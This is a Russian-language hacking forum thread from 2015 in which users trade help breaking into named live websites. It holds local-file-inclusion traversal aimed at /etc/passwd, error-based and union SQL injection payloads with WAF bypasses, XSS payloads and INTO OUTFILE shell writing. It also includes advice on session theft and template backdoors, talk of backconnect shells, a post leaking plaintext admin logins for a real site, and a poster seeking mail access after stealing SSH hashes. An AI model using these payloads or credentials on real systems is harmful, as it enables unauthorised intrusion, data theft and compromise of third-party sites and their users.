Просмотр полной версии : Ваши вопросы по уязвимостям.
teh said:
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
incorrect_path/../../etc/passwd%00
BigBear said:
incorrect_path/../../etc/passwd%00
это нужно подставить?
когда подставляю получаю
Warning: include(): Failed opening '../kinonetwork/incorrect_path/../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
Ты уже рядом. Надо больше ../
Ищи, пробуй.
BigBear said:
Ты уже рядом. Надо больше ../
Ищи, пробуй.
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
winstrool
20.03.2015, 23:46
teh said:
дошел до 20 и думаю, дальше ничего не будет. Значить, уже ничего не сделаешь?
Разложи карты ТАРО, они подскажут тебе верное направление или внимательней перечитай мануалы, может повезет, поймешь более правильный вектор, каждый случай индивидуальный и требует индивидуального рассмотрение на примере...
Помогите, пожалуйста немогу найти инклуд
kinopalace.lviv.ua/kinonetwork/?id=../
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
madam said:
что за н... при SELECT любой столбец FROM users LIMIT 1,1 всё нормально ,кроме SELECT wallet_address FROM users LIMIT 1,1 Subquery returns more than 1 row
через group_concat выводите
faza02 said:
через group_concat выводите
спасибо
teh said:
Здраствуйте. Нашел ошибку file inclusion. Но когда питаюсь подключить сайти или вывести файл etc/passwd получаю
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(../kinonetwork/../../../../../../../../../../etc/passwd.html): failed to open stream: No such file or directory in /home/kinopal/main/tmpl/network.php on line 6
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd.html' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
подставляю %00 и получаю
Warning: include(): Failed opening '../kinonetwork/../../../../../../../../../../etc/passwd' for inclusion (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/kinopal/main/tmpl/network.php on line 6
можно что нибудь сделать или уже ничего не вытащить?
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
Манов на форуме достаточно!
YaBtr said:
На подставление нулл-байта и изменении количества ../ поиск не ограничивается. Проанализируйте, есть ли есть waf на сайте, какие настройки и версия php используется( возможно ли использовании include в конструкции if, нормализация, усечение пути, стрим врапперы etc).
По Вашим постам заметно, что используете самое малое количество методов, не пытаетесь разобраться во многом.
Манов на форуме достаточно!
спасибо, буду разбираться, простите за наверно глупые вопросы
Приветствую. так получилось, что ранее не занимался никогда уязвимостями, хотя опыта в вебе разного много. Так вот, нубский вопрос.
Выбрал цель http://www.colorfoto.de . Сканером нашел уязвимость здесь
Code:
http://www.colorfoto.de/abo/sonderhefte/?hnr=online.aboshop.colorfoto.stageteaser-canonEOS7D
Собственно, при подставлении
Code:
' --
в конец значния параметра hnr результат не меняется. значит не фильтруются эти символы, так? попробовал руками большинство методов из "SQL injection полный FAQ". Так же, результат вывода не меняется, значит команды принимаются, но отчет об ошибках отключен + при не верном результате все-равно возвращает исходную страницу, верно?
Собтвенно вопрос, если это инъекция - как хоть как-то узнать о результатах выполнения команды?
Сюда же - сайт как я понял на каком-то MVC фреймворке сделан. как определить каком именно ?
kingbeef
24.03.2015, 16:02
opahopa said:
Приветствую. так получилось, что ранее не занимался никогда уязвимостями, хотя опыта в вебе разного много. Так вот, нубский вопрос.
Выбрал цель http://www.colorfoto.de . Сканером нашел уязвимость здесь
Code:
http://www.colorfoto.de/abo/sonderhefte/?hnr=online.aboshop.colorfoto.stageteaser-canonEOS7D
Собственно, при подставлении
Code:
' --
в конец значния параметра hnr результат не меняется. значит не фильтруются эти символы, так? попробовал руками большинство методов из "SQL injection полный FAQ". Так же, результат вывода не меняется, значит команды принимаются, но отчет об ошибках отключен + при не верном результате все-равно возвращает исходную страницу, верно?
Собтвенно вопрос, если это инъекция - как хоть как-то узнать о результатах выполнения команды?
Сюда же - сайт как я понял на каком-то MVC фреймворке сделан. как определить каком именно ?
Если я правильно понял, то ты подставляешь разные векторы, а в ответ исходная страница?
kingbeef said:
Если я правильно понял, то ты подставляешь разные векторы, а в ответ исходная страница?
да, верно
billybonse
25.03.2015, 00:47
opahopa said:
Сюда же - сайт как я понял на каком-то MVC фреймворке сделан. как определить каком именно ?
Поставь плагин wappalyzer на фф.
basket.js framework.
basket.js Это видимо просто скрипт корзины совпадающий с таким на других сайтах. получается тогда на безе CMS OXID e-shop согласно скрипту, но вероятность верного определения насколько велика?
Назрел тут вопрос по sql injection, ns clounfire, пытаюсь выполнить такой запрос но безрезультатно.
https://site.net/index.php'+and+(SeLeCt '' InTo OuTfIlE '/home/site/public_html/site.net/tester.php')
Не дает выполнить из-за
[QUOTE="sysjuk"]
sysjuk said:
Назрел тут вопрос по sql injection, ns clounfire, пытаюсь выполнить такой запрос но безрезультатно.
https://site.net/index.php'+and+(SeLeCt '' InTo OuTfIlE '/home/site/public_html/site.net/tester.php')
Не дает выполнить из-за ' InTo OuTfIlE '/home/site/public_html/site.net/tester.php')
Не дает выполнить из-за
Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname ,popen,proc_open,shell_exec,show_source,system
как нибудь можно обойти эти ограничения?
sysjuk said:
Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname ,popen,proc_open,shell_exec,show_source,system
как нибудь можно обойти эти ограничения?
смотря, что вам нужно
[QUOTE="OxoTnik"]
OxoTnik said:
Если экранируется
sysjuk said:
Disabled PHP Functions: exec,ini_get_all,parse_ini_file,passthru,php_uname ,popen,proc_open,shell_exec,show_source,system
как нибудь можно обойти эти ограничения?
Банально - запилить бэкконект.
5maks5 said:
Банально - запилить бэкконект.
бэкконект не работает в этом все и дело.
Не могу залиться в IPB 1.3. Доступ админа есть.
Пробовал через смайлы - не получилось.
Пробовал sql запросом - нет прав на запись.
Какие еще способы есть ?
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
teh said:
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
попробуй так
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
Vip77 said:
попробуй так
Code:
' and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,Hex(cast(database() as char)),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and '1'='1
спасибо, но так тоже не работает
kingbeef
28.03.2015, 04:01
teh said:
Не могу разобраться с sql инъекцией. Когда использую order byб подобралб все хорошо, страница отображается. Когда начинаю использовать union select то страница не отображается. Пробивал /*!union*/ не помогает, может подскажите что делать, пожалуйста?
Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
kingbeef said:
Попробуй сделать запрос без union либо без select , если отобразится страница, то пробуй обойти фильтр.
ага, понял. Буду пробовать, спасибо
возможно, что там два последовательных запроса. возможно, что это не mysql
Есть вопрос, возможно ли через MySql LOAD FILE посмотреть список файлов в директории?
sysjuk said:
Есть вопрос, возможно ли через MySql LOAD FILE посмотреть список файлов в директории?
Если ОС сервера FreeBSD.
sysjuk said:
Есть вопрос, возможно ли через MySql LOAD FILE посмотреть список файлов в директории?
думаю если есть права на LOAD_FILE, залей шелл, дальше по анологии
gromoza said:
Если ОС сервера FreeBSD.
Беда, с Linux 2.6.32-042stab094.8 #1 SMP Tue Dec 16 20:36:56 MSK 2014 i686 мб еще какие нибудь варианты есть? Файлы то читаются нормально, но нужно знать полный список файлов в каталоге.
teh said:
думаю если есть права на LOAD_FILE, залей шелл, дальше по анологии
Шелл залит, но права нищенские все функции в Disabled.
бэкконект не катит тоже.
winstrool
29.03.2015, 18:12
sysjuk said:
Шелл залит, но права нищенские все функции в Disabled.
бэкконект не катит тоже.
Используйте обычные функции пхп, для просмотра и редактирования файлов и папок
winstrool said:
Используйте обычные функции пхп, для просмотра и редактирования файлов и папок
Попробую более детально описать ситуацию.
Есть сайт залитый шелл но права там нищенские а именно:exec,ini_get_all,parse_ini_file,passt hru,php_uname,popen,proc_open,shell_exec,show_sour ce,system
все активные команды заблокированы.
Есть второй сайт, который работает в локалке(из вне не доступен).
Могу читать конфиг и.т.д этого сайта через mysql load file, но нужно узнать какие именно файлы расположены в директории этого сайта.
Какими способами можно вообще получить такие данные, бэк не катит уже, всю голову переломал, за лучший ответ который поможет прочитать в папке этой файлы 5$ дам)
Забыл упомянуть (48 ( apache ) Group: 513 ( ? )) из папки не выйти права 0751
winstrool
29.03.2015, 18:23
sysjuk said:
Попробую более детально описать ситуацию.
Есть сайт залитый шелл но права там нищенские а именно:exec,ini_get_all,parse_ini_file,passt hru,php_uname,popen,proc_open,shell_exec,show_sour ce,system
все активные команды заблокированы.
Есть второй сайт, который работает в локалке(из вне не доступен).
Могу читать конфиг и.т.д этого сайта через mysql load file, но нужно узнать какие именно файлы расположены в директории этого сайта.
Какими способами можно вообще получить такие данные, бэк не катит уже, всю голову переломал, за лучший ответ который поможет прочитать в папке этой файлы 5$ дам)
попробую тогда болие корректно изложится, если прова позволяют, то можно "ПОПРОБОВАТЬ" средствами пхп просмотреть, что находится в папке!
winstrool said:
попробую тогда болие корректно изложится, если
прова позволяют
, то можно "
ПОПРОБОВАТЬ
"
средствами пхп
просмотреть, что находится в папке!
Хотя ты прав, сейчас попробую, скинь биткоин кошелек в личку, если все пройдет, то 5$ скину.
http://www.garden4less.co.uk/g4ladmin/login.asp?page=/g4ladmin/admin.asp
garden4less:mango5white
http://www.garden4less.co.uk/newadmin/login.asp
barton:aniram
помогите шелл залить)
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:
http://c2n.me/3fdFtF3.png
В чем может быть причина?
мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.
PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
Br@!ns said:
При эксплуатации sql инжекта возникла проблема. всего 2 таблицы основная и Information.schema. Узнаю без проблем имена таблиц с помощью select table_name from information_schema.tables. когда пытаюсь вытащить данные с таблиц получается вот это:
http://c2n.me/3fdFtF3.png
В чем может быть причина?
мб из-за того что имя таблицы преобразовываются в верхний регистр? но тогда почему вытянулись данные с information_schema опять же.
PS при запросе select blabla from ws_lifefitness_live_us.admin_user_owners пишет SELECT command denied to user 'user'@'localhost' for table 'ADMIN_USER_OWNERS'
Во-первых, blabla - строковая константа, а потому должна обрамляться кавычками с двух сторон для корректности запроса.
Если blabla - реально существуюший стобец, тогда не надо. Но я подозреваю, что он не существует.
Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
BigBear said:
Во-вторых, я полагаю что в твоей схеме не существует такой таблицы. При вытаскивании данных желательно использовать полный адрес для таблицы типа "information_schema.tables". примеры - my_database.my_table , `my_database`.my_table , `my_database`.`my_table`
нашел выход в нахождении другой sql, вопрос решен.
'+and+(SeLeCt+1+FrOm(SeLeCt+count(*),CoNcAt((SeLeC t(SeLeCt(SeLeCt+CoNcAt(char(33,126,33),MAIN_PASSWO RD,char(33,126,33))+FrOm+currency+LiMiT+15,1))+FrO m+information_schema.TaBlEs+LiMiT+0,1),floor(rand( 0)*2))x+FrOm+information_schema.TaBlEs+GrOuP+By+x) a)+and+'1'='1
выводит: Subquery returns more than 1 row
как правильно составить)?
свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
DezMond™
03.04.2015, 16:33
http://www.menschenrechte.ac.at/db/suche/bib_erg.php
post запрос
PHP:
schlag1=--+Bitte+ausw%E4hlen+--&op1=AND&schlagtext2=&schlag2=--+Bitte+ausw%E4hlen+--&op2=ANDschlag3=--+Bitte+ausw%E4hlen+--&bib_suche=Suche+starten&autor=aaa'
Помогите раскрутить...
faza02 said:
↑ (https://antichat.live/posts/3834132/)
свой вывод помести в group_concat(). и пользуйся поиском, пару страниц назад такой вопрос уже был
Все мануалы прокурил не могу составить, завис к тому же на ошибке: Operand should contain 1 column(s).
Можешь все же помочь с составлением правильного запроса?!
Все решил задачу эту, спасибо.
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
Например даю запрос
union select 1,2,login from users limit 1,1
Выводить одну запись, можно зделать запрос что б вывело несколько?
teh said:
↑ (https://antichat.live/posts/3834910/)
Здраствуйте! Хочу спросить, есть ли возможность обойти limit в скулях, что б вывелось все сразу.
Например даю запрос
union select 1,2,login from users limit 1,1
Выводить одну запись, можно зделать запрос что б вывело несколько?
group_concat(login)
faza02 said:
↑ (https://antichat.live/posts/3834934/)
group_concat(login)
спасибо!
billybonse
06.04.2015, 15:25
Нашел скулю, запрос http://xxx.com/cat/15?order=id&order_type=DESC
Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
Выводит
A Database Error Occurred
Error Number: 1221
Incorrect usage of UNION and ORDER BY
SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50
Помогите дальше раскрутить.
billybonse
06.04.2015, 15:52
единственное, что сам сделал, так это
15?order=(id*1) и 15?order=(id*-1)
но вытащить никакие данные не могу
billybonse said:
↑ (https://antichat.live/posts/3835206/)
Нашел скулю, запрос
http://xxx.com/cat/15?order=id&order_type=DESC
Делаю такой запрос /cat/15?order=id union select 1--&order_type=DESC
Выводит
A Database Error Occurred
Error Number: 1221
Incorrect usage of UNION and ORDER BY
SELECT * FROM (`items`) WHERE `category` = '15' AND `sold` = '0' ORDER BY `id` union select 1-- DESC LIMIT 50
Помогите дальше раскрутить.
может стоит начать со статей по sqli? можно, заодно, пройти челлендж, чтобы лучше понять /threads/423579/ (https://antichat.live/threads/423579/)
billybonse
06.04.2015, 16:04
Спасибо за совет, статьи читал конечно же, в гугле смотрел, но сам не смог разобраться, поэтому и спросил в этой теме.
billybonse said:
↑ (https://antichat.live/posts/3835220/)
Спасибо за совет, статьи читал конечно же, в гугле смотрел, но сам не смог разобраться, поэтому и спросил в этой теме.
уязвимый параметр в ORDER BY. крутить либо как blind, либо https://rdot.org/forum/showthread.php?t=2865, либо, добавив LIMIT, использовать это: https://rdot.org/forum/showpost.php?p=36186&postcount=30
billybonse
06.04.2015, 17:30
faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
billybonse said:
↑ (https://antichat.live/posts/3835283/)
faza02, это я понял, не могу сформировать запрос чтобы дальше крутить
вроде там достаточно информации.
Code:
http://xxx.com/cat/15?order=1+LIMIT+0+PROCEDURE+ANALYSE+(0,(SELECT+3+ ORDER+BY+updatexml(1,concat(0x3A,version()),1)))--+&order_type=DESC
billybonse
06.04.2015, 17:36
Error Number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'DESC LIMIT 50' at line 5
SELECT * FROM (`items`) WHERE `category` = '10' AND `sold` = '0' ORDER BY `1` LIMIT 0 PROCEDURE ANALYSE (0, (SELECT 3 ORDER BY updatexml(1, concat(0x3A, version()), `1)))--` DESC LIMIT 50
знак комментария обязательно должен быть с пробелом в конце. если хотите, чтобы вам помогли, скиньте ссылку
Не нужно здесь разводить такую переписку. Для этого есть другие средства.
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
попугай said:
↑ (https://antichat.live/posts/3835485/)
Есть сайт на VDS, на нем стал появлятся какой-то левый js-код в некоторых js-файлах. PHP-работал от того же юзера, что и на FTP, то есть имел полные права. Я удалил код, поискал шеллы - не нашел ничего, сменил пасс на ftp. Через несколько дней код снова появился. Обшарил все - шеллов не нашел, но были мои шеллы, я подумал что как-то через них может заливается чувак, сменил пассы на них, удалил код, права поменял, теперь php работает как nobody, на js-файлы теперь доступа нет. Через несколько дней снова код появился, я в ахуе. Проверяю логи apache - нет ничего подозрительного, проверяю логи панели vds - тоже ничего подозрительного. И что характерно, права на js-файл сменены на 777, то есть кто-то имеет доступ к аккаунту, что и ftp. Как это возможно? Как найти паразита?
Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
5maks5 said:
↑ (https://antichat.live/posts/3835488/)
Очевидно, троян на вашем компьютере.
Айболитом не проверяли?
Троян теоретически возможен. Но windows security essentials молчит, да и в автозагрузке ничего подозрительного.
http://www.amnh.org/ology/xCards/index.php?cardNumber=047
Помогите WAF обойти.
Code:
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=5,1,% 27(%27))*/+--+ TRUE
http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27+/*!and+(select+1+regexp+if(mid(@@version,1,1)=4,1,% 27(%27))*/+--+ FALSE
Извращенский вариант, но имеет право на жизнь
// YaBtr: Regexp
kingbeef
07.04.2015, 10:52
Br@!ns said:
↑ (https://antichat.live/posts/3835514/)
http://www.amnh.org/ology/xCards/index.php?cardNumber=047
Помогите WAF обойти.
http://www.amnh.org/ology/xCards/index.php?cardNumber=047'*updatexml(1,concat(0x3A, version()),1)*' (http://www.amnh.org/ology/xCards/index.php?cardNumber=047%27*updatexml(1,concat(0x3 A,version()),1)*%27)
Ну и в добавочку.
http://www.amnh.org/ology/xCards/index.php?cardNumber=047">xss (http://www.amnh.org/ology/xCards/index.php?cardNumber=047%22%3E%3Ch1%3Exss%3C/h1%3E)
Code:
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=1 - TRUE
http://www.maesen.com/sexshop/ArticulosMini.php?pagina=(45)and(1)=0 - FALSE
https://www.maesen.com/sexshop/video_web.php?video=(6635)and(1)=0 - FALSE
не могу waf обойти, есть варианты?
PS
Code:
http://www.maesen.com/sexshop/video_web.php?video=(88886635)or+1=(SELECT+TOP+1+' id'+FROM+adminusuarios)
с information_schema.tables вытащить имя колонок с таблицы adminusuarios не получается, при использовании "_" пишет нет такой директори
larinvlad
10.04.2015, 10:29
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt(973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
winstrool
10.04.2015, 11:33
larinvlad said:
↑ (https://antichat.live/posts/3836495/)
Сканировал с помощью акунетикса: /wp-content/plugins/gd-star-rating/ajax.php
Нашел XSS, написано:
asr.84391.0.7.1428069437.10.0.30.3.3.0'"()&%prompt(973439)
Как его использовать? И даст ли это возможность доступа к бд ?
Раскручивать sql немного умею, но здесь не знаю куда копать.
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
kingbeef
10.04.2015, 12:28
winstrool said:
↑ (https://antichat.live/posts/3836508/)
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
Ты ему не помог, ему нужно раскрутить sql через xss .
larinvlad
10.04.2015, 13:13
winstrool said:
↑ (https://antichat.live/posts/3836508/)
Можете составить запрос который похищает сессию, и в парить его админу или составить запрос который автоматом вписывает бегдор в шаблон темплейта, но естественно это должен сделать авторизованный админ.
Не могли бы скинуть ссылку на статью где рассматривается выполнение подобных запросов?
larinvlad said:
↑ (https://antichat.live/posts/3836543/)
Не могли бы скинуть ссылку на статью где рассматривается выполнение подобных запросов?
в любой статье по XSS это рассматривается. рядом с этой темой в "важных" есть карта раздела. /threads/20140/ (https://antichat.live/threads/20140/)
Здравствуйте! Нужна помощь. Вот 2 прогона от sqlmap:
#1 http://rghost.ru/private/6TmxNVXSQ/f4be5442215c6d4f07720fddf568e844
#2 http://rghost.ru/private/6qgdBCK4S/b05166809cf70ed629397c2789cc97c5
Что можно выцепить? Я просто с sqlmap 1 раз работаю... Обычно подставил ' и пошло дело... Не пошло - дальше ручками пытаемся... Решил попробовать софтину. Сначала немного был ошарашен количеством тестов (ручками вечность перебирать будешь=)),но результат как-то не очень оказался... (хотя,скорее всего,я что-то не так сделал)
xxl said:
↑ (https://antichat.live/posts/3836956/)
Здравствуйте! Нужна помощь. Вот 2 прогона от sqlmap:
#1
http://rghost.ru/private/6TmxNVXSQ/f4be5442215c6d4f07720fddf568e844
#2
http://rghost.ru/private/6qgdBCK4S/b05166809cf70ed629397c2789cc97c5
Что можно выцепить? Я просто с sqlmap 1 раз работаю... Обычно подставил ' и пошло дело... Не пошло - дальше ручками пытаемся... Решил попробовать софтину. Сначала немного был ошарашен количеством тестов (ручками вечность перебирать будешь=)),но результат как-то не очень оказался... (хотя,скорее всего,я что-то не так сделал)
посмотрели бы видео по теме, полно же в сети. касаемо логов:
Code:
all tested parameters appear to be not injectable
почти последняя строка.
faza02 said:
↑ (https://antichat.live/posts/3836977/)
посмотрели бы видео по теме, полно же в сети. касаемо логов:
в том-то и дело,что не нашел.
faza02 said:
↑ (https://antichat.live/posts/3836977/)
all tested parameters appear to be not injectable
possible integer casting detected (e.g. "$userid=intval($_REQUEST['userid'])") at the back-end web application - ?
Ладно,можно ссылку на подробный мануал(русский только),пожалуйста
Вот опять: all tested parameters appear to be not injectable
НО: target URL appears to be UNION injectable with 1 columns
log: http://rghost.ru/private/6Mt4dGwZD/b50eaa2717166e2b581189961825c0dd
xxl said:
↑ (https://antichat.live/posts/3837008/)
Вот опять: all tested parameters appear to be not injectable
НО: target URL appears to be UNION injectable with 1 columns
log:
http://rghost.ru/private/6Mt4dGwZD/b50eaa2717166e2b581189961825c0dd
Так бывает, когда скуля раскручиваемая, но SQLMap не может придумать вектор в рамках своей неопытности. Такой случай только руками.
BigBear said:
↑ (https://antichat.live/posts/3837011/)
Так бывает, когда скуля раскручиваемая, но SQLMap не может придумать вектор в рамках своей неопытности. Такой случай только руками.
Хорошо,уже что-то... А какой из параметров? first_name? у меня ручками не получается... (';+UNION+SELECT+error-based & etc). А вообще я запускал софтину с ключем --parse-errors. А это значит,что он должен был мне показать саму ошибку,так? Или нужно было включить траффик-лог?
Вообще то в работе пишут какой параметр injectable.
Почитал твой последний лог - у тебя там вообще не описан URL.
Отсюда вывод, что либо он имеет вид url/?param=123 или url/param/123 и SQLMap автоматом атакует последний и единственный параметр.
После уязвимого параметра нужно (*) поставить, чтобы обозначить точку атаки.
BigBear said:
↑ (https://antichat.live/posts/3837044/)
Отсюда вывод, что либо он имеет вид url/?param=123 или url/param/123 и SQLMap автоматом атакует последний и единственный параметр.
http://sub.adomain.ru/users/register/ т.е. он долбит по "register"... Нежиданно.... Мне казалось,что изначально он прогоняет data-параметры
(те,что постом идут)
python /CMS/sqlmap-master/sqlmap.py -u "http://sub.adomain.ru/users/register/ " --data="first_name=aaa&last_name=aaa&email=aqwe@sda.ru (mailto:aqwe@sda.ru)&password_1=asdasd&password_2=asdasd&country=none&city=ffff&phone_number=%2B894613216516&traffic_source_types[]=interesting&traffic_desc=ddddd&spec=register&_q=1" -f --random-agent --banner --parse-errors --all --risk=3 --level=5 --batch --dump-format=HTML --output-dir='/var/www/../' -t '/var/www/../traff.txt' > '/var/www/../log.txt'
В общем,если есть возможность и желание,то прошу помощи,т.к. сам не смог разобраться
log: http://rghost.ru/private/6LHmtr2tj/45ef36d7704be9bf4bc49b6bd2f9c241
traff: http://rghost.ru/private/8tx2bwB6Y/a1446f5dad951f089afa935d0ea42365
Пробовал сделать поиск по файлу траффика(т.к. БД была определена Oracle=> ошибки искал,как ORA-*) результата нет. Да и вообще там нет ошибок,как мне кажется
Есть доступ ко всем файлам на сервере, вытащила ssh хэши, пароли SQL в чистом виде. в общем, это здорово, но мне нужен доступ к их почтам. Не подскажете, где могут быть конфиги?
EDIT: они юзают horde webmail=>/etc/psa/.webmail.shadow верно? Но этот файл закрыт на чтение root only FUCK. Неужели нет никаких более способов? Неужели я потратила целый день за зря ? ну таааааааааааааак обидно, сил нет
SquirrelMail 1.4.21 - есть ли уязвимости? Погуглил - информация о наличии уязвимостей есть,но нет эксплойтов...
+ ISPmanager v4 lite. Есть ли что-то? (кроме открытой передачи пароля в API)
http://www.techexpo.kiev.ua/info_pa...ogin,4 from eebcnet_techexpo.users--&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=-37%20union%20select%201,2,ulogin,4%20from%20eebcne t_techexpo.users--&sub_id=1)
помогите не могу раскрутить
teh said:
↑ (https://antichat.live/posts/3838790/)
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,ulogin,4 from eebcnet_techexpo.users--&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=-37%20union%20select%201,2,ulogin,4%20from%20eebcne t_techexpo.users--&sub_id=1)
помогите не могу раскрутить
http://www.techexpo.kiev.ua/info_page.php?id=-37 OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY MID(VERSION(), FLOOR(RAND(0)*2), 64)) (http://www.techexpo.kiev.ua/info_page.php?id=-37%20OR%20(SELECT%20COUNT(*)%20FROM%20(SELECT%201% 20UNION%20SELECT%202%20UNION%20SELECT%203)x%20GROU P%20BY%20MID(VERSION(),%20FLOOR(RAND(0)*2),%2064)) ) - версия БД.
(
это если ручками хочешь перебирать,а так:
sqlmap сказал,что
[WARNING] no table(s) found.
Но он пиздит 100%,там самому надо перебирать(SELECT table_name FROM INFORMATION_SCHEMA.COLUMNS WHERE table_schema = 'DB')
)
kingbeef
19.04.2015, 07:32
teh said:
↑ (https://antichat.live/posts/3838790/)
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,ulogin,4 from eebcnet_techexpo.users--&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=-37%20union%20select%201,2,ulogin,4%20from%20eebcne t_techexpo.users--&sub_id=1)
помогите не могу раскрутить
Там нету такой таблицы
http://www.techexpo.kiev.ua/info_pa...656562636e65745f746563686578706f--+k&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=37+union+select+1,2,3,group_conca t(table_name)+from+information_schema.tables+where +table_schema=0x656562636e65745f746563686578706f--+k&sub_id=1)
eebc.cms_users
http://www.techexpo.kiev.ua/info_pa...e,4 from information_schema.tables--&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=-37%20union%20select%201,2,table_name,4%20from%20in formation_schema.tables--&sub_id=1)
но, information_schema показывает что она существует
teh said:
↑ (https://antichat.live/posts/3838995/)
http://www.techexpo.kiev.ua/info_page.php?id=-37 union select 1,2,table_name,4 from information_schema.tables--&sub_id=1 (http://www.techexpo.kiev.ua/info_page.php?id=-37%20union%20select%201,2,table_name,4%20from%20in formation_schema.tables--&sub_id=1)
но, information_schema показывает что она существует
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
faza02 said:
↑ (https://antichat.live/posts/3839029/)
таким запросом вы увидите список всех таблиц из всех доступных бд. чтобы узнать таблицы из конкретной бд используйте where
спасибо, понял
xxl said:
↑ (https://antichat.live/posts/3839022/)
http://s019.radikal.ru/i637/1504/0b/8782f6bc460a.jpg
можно ли раскрутить самому? и как
xxl , если хотите, чтобы Вам помогли, то нужно задавать корректный и внятный вопрос, а еще лучше, опубликовать ссылку на язвимый сайт. Читайте правила! Если не отредактируете, пост будет удален.
sunnyfruit
20.04.2015, 16:45
Парни, подскажите, можно тут раскрутить php LFI:
https://autopaymentfinder.com/dealers/index.php?p=ll
